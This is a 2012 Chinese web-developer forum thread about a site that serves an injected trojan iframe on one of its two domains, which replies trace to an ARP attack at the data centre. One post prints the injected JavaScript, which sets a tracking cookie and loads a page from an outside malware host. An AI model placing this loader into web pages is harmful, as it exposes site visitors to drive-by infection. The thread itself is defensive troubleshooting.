谁遇到过此问题:一个网站绑定两个域名,一个域名访问被挂马,另一个却没挂马?

iSea 发布于 2012/02/06 20:00
阅读 744
收藏 0

谁遇到过此问题:一个网站绑定两个域名,一个域名访问被挂马,另一个却没挂马?

机房是浙江电信。

以下是问题补充:

@iSea:谁能解释一下这个是域名提供商处被挂马了,还是机房被挂马了?检查了程序没问题,要是程序有问题应该两个域名访问都有问题。目前只有一个域名访问有问题,两个域名提供商不同 (2012/02/06 20:22)
加载中
0
leo108
leo108
你是如何判断是否被挂马的?看网页源代码么?
iSea
iSea
用第一个域名打开也页面360,金山等提示网站被挂马,查看源代码,看到的是js打印的<iframe>内嵌代码,自己的代码看不到,但是页面正常显示,用另一个域名访问一切正常
0
该用户已被和谐
该用户已被和谐
手下你要说清楚是被挂了什么样的马?症状是什么?是不是某些页面被注入了代码?但是代码里判断了域名if 域名=="当前请求的" 就跳转到其他页面。以前公司主页被挂过,只要百度搜索出来的一点就到一个其他页。经查是页面被注入了代码。
iSea
iSea
被挂马的域名,查看发现cookies里多了一个CK=test
0
lanybass
lanybass
给出域名,待俺老农查探一番
0
leo108
leo108
域名提供商没有权力影响你的网页内容……你看下两个域名的解析有没有出问题
iSea
iSea
用第一个域名打开也页面360,金山等提示网站被挂马,查看源代码,看到的是js打印的<iframe>内嵌代码,自己的代码看不到,但是页面正常显示,用另一个域名访问一切正常。 解析没问题,都是同一个ip
0
leo108
leo108
有可能是机房被人ARP攻击了……
iSea
iSea
的确是机房arp攻击。
0
iSea
iSea

引用来自“leo108”的答案

有可能是机房被人ARP攻击了……
木马病毒在地址后面加了?CFG
病毒发作特征,查看页面元代码为
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location=" http://sdn28.8800.org:776/gvod/as.htm";}
}
leo108
leo108
你还是把域名发出来看看吧……
0
李黎黎
李黎黎

我的网站也遇到了类似的问题,http://www.csysk.com 百度搜索时,提示被挂马,

但另外一个域名http://www.cqeis.com搜索时没有时间,问题的关键是,前面一个域名是301重定向到后面一个域名的,解析到同一

个域名空间的,到底是哪里的问题呢?

返回顶部
顶部